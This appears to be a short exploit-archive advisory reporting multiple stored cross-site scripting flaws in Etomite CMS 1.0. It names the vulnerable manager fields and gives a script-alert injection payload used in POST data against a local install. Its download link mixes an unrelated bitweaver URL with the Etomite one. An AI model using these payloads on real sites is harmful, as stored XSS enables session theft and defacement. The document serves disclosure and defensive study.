Etomite CMS version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.
03297861e20ae136d1ffe9af9c3c761ca962e65581d437daa1ad83379d80f178
____/\______.__ ________ _________ _____ ____/\__ ____/\__
_____ ____/\__ ____/\______
/ / /_/_ | | \_____ \ ___\______ \ / ___ \/ / /_// /
/_/ / ___ \/ / /_// / /_/_ | ____
\__/ / \ | | | _(__ < / \ / / / / ._\ \__/ / \ \__/ / \
/ / ._\ \__/ / \ \__/ / \ | |/ \
/ / / \| | |__/ \ | \/ / < \_____/ / / \/ / /
< \_____/ / / \/ / / \| | | \
/_/ /__ /|___|____/______ /___| /____/ \_____\/_/ /__ /_/ /__
/\_____\/_/ /__ /_/ /__ /|___|___| /
\/ \/ \/ \/ \/ \/ \/ \/
\/ \/ \/ \/ \/
------------------------------------------------------------------------------
-------------------------------------------------------------------
TITLE: Etomite CMS Multiple stored XSS
Vendor: Etomite CMS
Author: $1l3n7 @$$@$$17
Email: sil3ntb0t@gmail.com
Download Link:
<https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download>http://www.etomite.com/files/file/323-etomite-11/
Versions: 1.0
Tested on: Windows7
------------------------------------------------------------------------------
------------------------------------------------------------------------------
DEMO:
A)Persistent XSS
http://localhost/etomite/manager/index.php
DEMO:
http://localhost/etomite/manager/index.php
New Document, New Weblink, Messages(subject and content),
New keyword(manage resources)
No of log entries,no of messages and many more fields are
vulnerable to stored XSS.
POST DATA= "'-->><script>alert(/xss/)</script>
Eg:
1: In Manage Resource in keyword tab, 'create new keyword' field
POST DATA= "'-->><script>alert(0)</script>
2: Similarly 'New Template' field
http://localhost/etomite/manager/index.php
POST DATA= "'-->><script>alert(/xss/)</script>
----------------------------------------------------------------------------
gr33t1ngs and ShOuTZ to r007k17-w and all my friends..